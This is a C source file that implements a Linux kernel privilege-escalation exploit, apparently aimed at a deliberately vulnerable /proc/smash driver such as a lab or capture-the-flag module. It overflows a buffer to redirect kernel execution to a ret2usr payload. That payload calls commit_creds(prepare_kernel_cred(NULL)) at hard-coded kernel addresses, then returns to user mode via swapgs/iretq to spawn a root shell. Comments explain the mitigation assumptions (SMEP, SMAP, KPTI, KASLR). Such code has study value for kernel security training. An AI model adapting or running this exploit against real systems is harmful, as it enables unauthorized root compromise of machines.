#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>
/*
 * Stack frame consumed by the `iretq` in payload(): iretq pops exactly five
 * quadwords in this order (rip, cs, rflags, rsp, ss), so the field order and
 * the 8-byte width of every member must not change.
 */
struct trap_frame{
void *rip;        /* user-mode resume address; prepare_tf() sets it to launch_shell */
uint64_t cs;      /* user code segment selector, captured in prepare_tf() */
uint64_t rflags;  /* user flags, captured in prepare_tf() via pushfq/popq */
void *rsp;        /* user stack pointer to resume on (captured rsp minus 1024) */
uint64_t ss;      /* user stack segment selector, captured in prepare_tf() */
};
/* The iret frame payload() points rsp at before `iretq`; filled in by prepare_tf(). */
struct trap_frame tf;
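/*
 * User-mode landing point reached through the iretq in payload().
 *
 * It runs on the fabricated stack set up by prepare_tf() (captured rsp
 * minus 1024), so there is no valid return address above this frame: the
 * function must never return. exit() after the shell terminates ensures
 * that, and propagates only whether system() could run at all.
 */
void launch_shell(void) {
    /* The purpose of this syscall is not evident from the code; kept as-is. */
    getuid();
    int rc = system("/bin/sh");
    /* Never `ret` into the fabricated frame. */
    exit(rc == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}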
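/*
 * Snapshot the current user-mode cs, ss, rflags and rsp into `tf` and point
 * tf.rip at launch_shell(), so the iretq in payload() lands back in ring 3
 * with the selectors and flags this process already runs with.
 *
 * Must be called from user mode before the vulnerable write in main().
 */
void prepare_tf(void){
    /* __asm__ rather than `asm`: the latter is not a keyword under -std=c11.
     * All four outputs are registers; the "memory" clobber stops the
     * compiler from caching tf fields across the statement.
     * NOTE(review): pushfq/popq writes below rsp; in a leaf function GCC may
     * keep data in the 128-byte red zone, so build with -mno-red-zone if
     * locals ever get corrupted here — confirm on the target toolchain. */
    __asm__ __volatile__( "movq %%cs, %0\n"
        "movq %%ss, %1\n"
        "movq %%rsp, %3\n"
        "pushfq\n"
        "popq %2\n"
        : "=r"(tf.cs), "=r"(tf.ss), "=r"(tf.rflags), "=r"(tf.rsp) :: "memory"
    );
    tf.rip = &launch_shell;
    /* Resume 1024 bytes below the captured rsp, presumably as a safety
     * margin below anything still live on the user stack. Done through
     * char * because arithmetic on void * is a GCC extension, not C11. */
    tf.rsp = (char *)tf.rsp - 1024;
}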
/* regparm(3) is the i386 kernel-internal calling convention; on x86-64 the
 * SysV ABI already passes the leading arguments in registers, so this
 * attribute is presumably a no-op here — harmless, but not what makes the
 * calls work. */
#define KERNCALL __attribute__((regparm(3)))
/* Kernel addresses of commit_creds() and prepare_kernel_cred(), hard-coded
 * for one specific kernel build. They must match the target exactly: take
 * them from that kernel's System.map or /proc/kallsyms, and note that with
 * KASLR the text base differs per boot, so fixed values only work when the
 * kernel is loaded unrandomised (or after adding the slide). */
void (*commit_creds)(void *) KERNCALL = (void *)0xffffffff81079680;
void *(*prepare_kernel_cred)(void *) KERNCALL = (void *)0xffffffff810799b0;
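/*
 * Runs in kernel mode once the overflow through /proc/smash redirects
 * control here: raise the calling task's credentials, then return to user
 * mode at launch_shell() through the frame stored in `tf`.
 *
 * This is a classic ret2usr payload and assumes the target lacks SMEP/SMAP
 * (user pages must be executable and readable from ring 0) and KPTI (the
 * user mapping of `tf` must be present when iretq executes). On kernels with
 * those mitigations it faults or panics instead of returning.
 */
void payload(void){
    /* prepare_kernel_cred(NULL) yields a root credential on older kernels;
     * newer kernels (6.2 onward) reject a NULL argument and return NULL. In
     * that case skip commit_creds() rather than dereferencing NULL in ring 0:
     * the shell then merely stays unprivileged instead of crashing the box. */
    void *root_cred = prepare_kernel_cred(NULL);
    if (root_cred)
        commit_creds(root_cred);
    /* Restore the user GS base, point rsp at the iret frame and return to
     * ring 3. `lea tf(%rip)` instead of `mov $tf`: a 32-bit absolute
     * relocation against tf does not link in a PIE executable, which is the
     * default on current distributions. __asm__ so it builds under -std=c11.
     * Basic asm (no operands), hence single `%` register prefixes. */
    __asm__ __volatile__(
        "swapgs\n"
        "lea tf(%rip), %rsp\n"
        "iretq\n"
    );
}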
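/*
 * Entry point: build the 16-byte overflow buffer, snapshot the user-mode
 * return frame, then trigger the vulnerable write on /proc/smash.
 *
 * Returns 0 when the write was issued in full (if the exploit fires, control
 * never comes back here), 1 when the device could not be opened or the
 * write failed or was short — in which case the payload did not run.
 */
int main(void){
    char buf[16];
    memset(buf, 'A', sizeof buf);
    /* Bytes 8..15 carry the address of payload(); presumably that is the
     * slot the driver's saved return address lives in — the offset is
     * specific to the vulnerable handler and must be confirmed against it.
     * memcpy avoids the aliasing cast through the char buffer. */
    void *target = (void *)&payload;
    memcpy(buf + 8, &target, sizeof target);
    prepare_tf();
    int fd = open("/proc/smash", O_WRONLY);
    if (fd < 0) {
        perror("open /proc/smash");
        return 1;
    }
    ssize_t n = write(fd, buf, sizeof buf);
    if (n < 0) {
        perror("write /proc/smash");
        close(fd);
        return 1;
    }
    if ((size_t)n != sizeof buf) {
        fprintf(stderr, "short write to /proc/smash: %zd of %zu bytes\n", n, sizeof buf);
        close(fd);
        return 1;
    }
    close(fd);
    return 0;
}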